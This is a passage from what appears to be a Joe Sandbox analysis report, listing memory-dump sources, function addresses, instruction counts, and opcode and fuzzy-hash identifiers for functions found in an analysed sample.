                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: iJh
                                      • API String ID: 0-3731254789
                                      • Opcode ID: d96e4ed4a4488f32ec9c81fa8b30145f43ea3801037cf2ab54df3134625df901
                                      • Instruction ID: 2e6e1fd503f1837892b4a113544738a526c8112014e73471dd9e1db4ef5bcb43
                                      • Opcode Fuzzy Hash: d96e4ed4a4488f32ec9c81fa8b30145f43ea3801037cf2ab54df3134625df901
                                      • Instruction Fuzzy Hash: 3D51ACF3E082145BF3106D29ECC57AABBC6DBD4320F1B853DDAC897B48F97948058286
                                      Function 00E32384 Relevance: 1.4, Strings: 1, Instructions: 179COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: L>2k
                                      • API String ID: 0-3915586722
                                      • Opcode ID: 67ef48011475f0d996c10de37c684ffe1a06bb1b2cbd5e2c1de9fea3c06263fd
                                      • Instruction ID: 08072ade3aff8d0d8ff07ebe93722f493d734aa8691108076e7765beeb3973e6
                                      • Opcode Fuzzy Hash: 67ef48011475f0d996c10de37c684ffe1a06bb1b2cbd5e2c1de9fea3c06263fd
                                      • Instruction Fuzzy Hash: 9E5108F7A092109FE3006E5DDC8476AF7D6EF98720F1A853DEAC487744EA3958148693
                                      Function 00AEE544 Relevance: .8, Instructions: 823COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                                      • Instruction ID: b1ce97e10d19f8deb91a778f3d2b2f9b671b0547b8431851d9720a2502b69de8
                                      • Opcode Fuzzy Hash: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                                      • Instruction Fuzzy Hash: E782E275A00F448FD765CF2AC880B92B7F1BF5A300F548A2EE9EA9B651DB30B545CB50
                                      Function 00B08E78 Relevance: .6, Instructions: 649COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                      • Instruction ID: 7bf8cac8b6f5d3411200689a2a4863282642b048bd3e50cd1027f9bc6f4d8e8f
                                      • Opcode Fuzzy Hash: b14a04dd6bdce6d3c84cf2c82878dd7ecb710331ddf643e538226ead79392ace
                                      • Instruction Fuzzy Hash: E4427D706047418FD7298F19C494666FFE2FF99310F288AEED4868B7D2D636E885CB50
                                      Function 00B3AC28 Relevance: .5, Instructions: 501COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                      • Instruction ID: 5ab68c650e2935ffb5e6b878a548e4be6008c496bfd62cdc02babb87f6e86ca1
                                      • Opcode Fuzzy Hash: 33a3ecce9cf6c937e2f0c1d2d9b4c4764a8803e2c9e6f8b29af544e94c312f39
                                      • Instruction Fuzzy Hash: 5E02F671E002168FCB15CF29C890AAFB7E2EFDA340F35836AE955B7251D770AD428790
                                      Function 00B198B8 Relevance: .5, Instructions: 482COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                                      • Instruction ID: 79e80756d57b41c103a04be20658219caffa54508307795b956f79ca64adf92d
                                      • Opcode Fuzzy Hash: 2ec5425ea166261dbb47060f071532c3a8487158838a74badd6abe20aeed5f87
                                      • Instruction Fuzzy Hash: 98022171A083858FCB14CF29D8903A9B7E1EFA5340F98876DEC999B352D331E9C58B41
                                      Function 00F05A65 Relevance: .5, Instructions: 453COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 96c9d595f8ac80b1053a22c5483020b82e79aa46733f9f92afced2c4fd0fca02
                                      • Instruction ID: bd0211b5a49c67f7316cebfc024634a20ade3324009503b2f332ab8d18830d7e
                                      • Opcode Fuzzy Hash: 96c9d595f8ac80b1053a22c5483020b82e79aa46733f9f92afced2c4fd0fca02
                                      • Instruction Fuzzy Hash: A5E118F3A0C6009FE3086E2CDC4576AB7E6EF94720F1A493DEAC5D7744EA3598048796
                                      Function 00B066C8 Relevance: .4, Instructions: 418COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                      • Instruction ID: d6bfe45562c6ab93ba6b2fea125e0e85f27873a423fff660241269a069893543
                                      • Opcode Fuzzy Hash: b8d9d4345e8cdc0c09525c5bce3898901bb43f275b80ce7cbd30b98cf4a35ec9
                                      • Instruction Fuzzy Hash: C0F15AA260C6914BC71D9A1484B08BD7FD29FA9201F0E86EDFDD70F393D924DA06DB61
                                      Function 00B4B308 Relevance: .4, Instructions: 415COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                      • Instruction ID: eea92d1c0cd586d0e8def6a5351aa6f2eb42e232481a2b78b7de403b2dd9b9f2
                                      • Opcode Fuzzy Hash: 57d5d0b81d74e29e3200a1e995e817443f7765a17d79ee01e02cba8c1ad760b9
                                      • Instruction Fuzzy Hash: ACD18473F20A254BEB08CA99DCD13ADB6E2EBD8350F19417ED916F7381D6B89D018790
                                      Function 00B30B88 Relevance: .4, Instructions: 378COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8086af1eee23c2ec03667c4df963516334ec34816eb8b1db30eae6a2209b88cb
                                      • Instruction ID: d985ad5cb58f8c55379b6faf01a361255d02b411d488194a34506f2218727f13
                                      • Opcode Fuzzy Hash: 8086af1eee23c2ec03667c4df963516334ec34816eb8b1db30eae6a2209b88cb
                                      • Instruction Fuzzy Hash: 60D1E372E102198BDF24DF98C8907EEB7F2FF89310F2482B9E915B7291D73459468B50
                                      Function 00B1B8A8 Relevance: .4, Instructions: 376COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                      • Instruction ID: 96ba2d214f8698340eef258e32b24aa5fee3ef46ffff4d910645a3562f459e44
                                      • Opcode Fuzzy Hash: 785eda4873c2745347b995e3ca024bc6e41954b75693d86a30469ec7c1fde165
                                      • Instruction Fuzzy Hash: FB027974E046598FCF16CFA8C4909EDBBF6FF89310F548199E8896B355C730AA91CB90
                                      Function 00B1BD68 Relevance: .4, Instructions: 372COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2159057947.0000000000AEC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                      • Associated: 00000000.00000002.2159046467.0000000000AC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000BFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000C2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159057947.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000000F25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000100A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.000000000102E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001036000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2159450310.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2161305989.0000000001045000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164369907.00000000011DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2164400168.00000000011E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_ac0000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b3095706403d8b2753a0f449caab4ca3cbf951e9973f819c05ee5ac836afa2e6
